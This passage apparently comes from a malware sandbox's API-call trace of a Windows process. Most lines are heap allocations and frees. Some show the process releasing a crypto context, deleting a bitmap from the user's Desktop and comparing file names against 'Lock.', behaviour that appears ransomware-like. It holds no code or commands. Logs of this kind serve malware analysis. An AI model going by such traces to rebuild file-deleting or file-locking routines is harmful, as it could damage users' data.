| out: hHeap=0x970000) returned 1 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0215.911] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0215.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0215.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0215.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0215.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0215.912] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0215.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0215.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0215.912] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0215.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0215.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0215.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0215.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0215.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0215.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0215.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0215.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0215.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0215.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0215.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0215.915] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0215.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0215.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0215.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0215.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.915] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0215.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0215.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0215.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0215.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0215.916] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.916] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0215.916] FreeLibrary (hLibModule=0x756e0000) returned 1 [0215.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.916] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.916] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0215.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0215.917] CloseHandle (hObject=0x2d0) returned 1 [0215.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0215.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0215.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0215.918] CloseHandle (hObject=0x2a0) returned 1 [0215.926] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0215.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0215.927] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0215.927] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0215.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0215.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0215.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0215.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0215.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0215.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0215.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e563a8 [0215.927] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ZsyajCuqv92xTr5whyk.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ZsyajCuqv92xTr5whyk.bmp", lpFilePart=0x8cedf4*="ZsyajCuqv92xTr5whyk.bmp") returned 0x2f [0215.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0215.928] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZsyajCuqv92xTr5whyk.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\zsyajcuqv92xtr5whyk.bmp")) returned 0x20 [0215.928] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZsyajCuqv92xTr5whyk.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e2731f0, ftCreationTime.dwHighDateTime=0x1d5eec8, ftLastAccessTime.dwLowDateTime=0xe4508660, ftLastAccessTime.dwHighDateTime=0x1d5ed65, ftLastWriteTime.dwLowDateTime=0xe4508660, ftLastWriteTime.dwHighDateTime=0x1d5ed65, nFileSizeHigh=0x0, nFileSizeLow=0x21a2, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="ZsyajCuqv92xTr5whyk.bmp", cAlternateFileName="ZSYAJC~1.BMP")) returned 0xa870d0 [0215.928] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZsyajCuqv92xTr5whyk.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\zsyajcuqv92xtr5whyk.bmp")) returned 1 [0216.154] FindNextFileW (in: hFindFile=0xa870d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e2731f0, ftCreationTime.dwHighDateTime=0x1d5eec8, ftLastAccessTime.dwLowDateTime=0xe4508660, ftLastAccessTime.dwHighDateTime=0x1d5ed65, ftLastWriteTime.dwLowDateTime=0xe4508660, ftLastWriteTime.dwHighDateTime=0x1d5ed65, nFileSizeHigh=0x0, nFileSizeLow=0x21a2, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="ZsyajCuqv92xTr5whyk.bmp", cAlternateFileName="ZSYAJC~1.BMP")) returned 0 [0216.154] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0216.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0216.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0216.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0216.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0216.155] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0216.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0216.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0216.155] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0216.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0216.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0216.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0216.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0216.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0216.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0216.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0216.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e563a8 [0216.157] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ZsyajCuqv92xTr5whyk.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ZsyajCuqv92xTr5whyk.bmp", lpFilePart=0x8cf650*="ZsyajCuqv92xTr5whyk.bmp") returned 0x2f [0216.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0216.157] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZsyajCuqv92xTr5whyk.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\zsyajcuqv92xtr5whyk.bmp")) returned 0xffffffff [0216.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0216.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0216.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0216.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0216.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0216.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0216.158] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0216.158] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.158] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0216.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0216.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0216.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0216.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0216.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0216.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0216.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0216.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0216.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0216.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0216.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0216.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_BsqZItCPNq0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BsqZItCPNq0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sqZItCPNq0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qZItCPNq0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0216.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZItCPNq0eBuQ.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 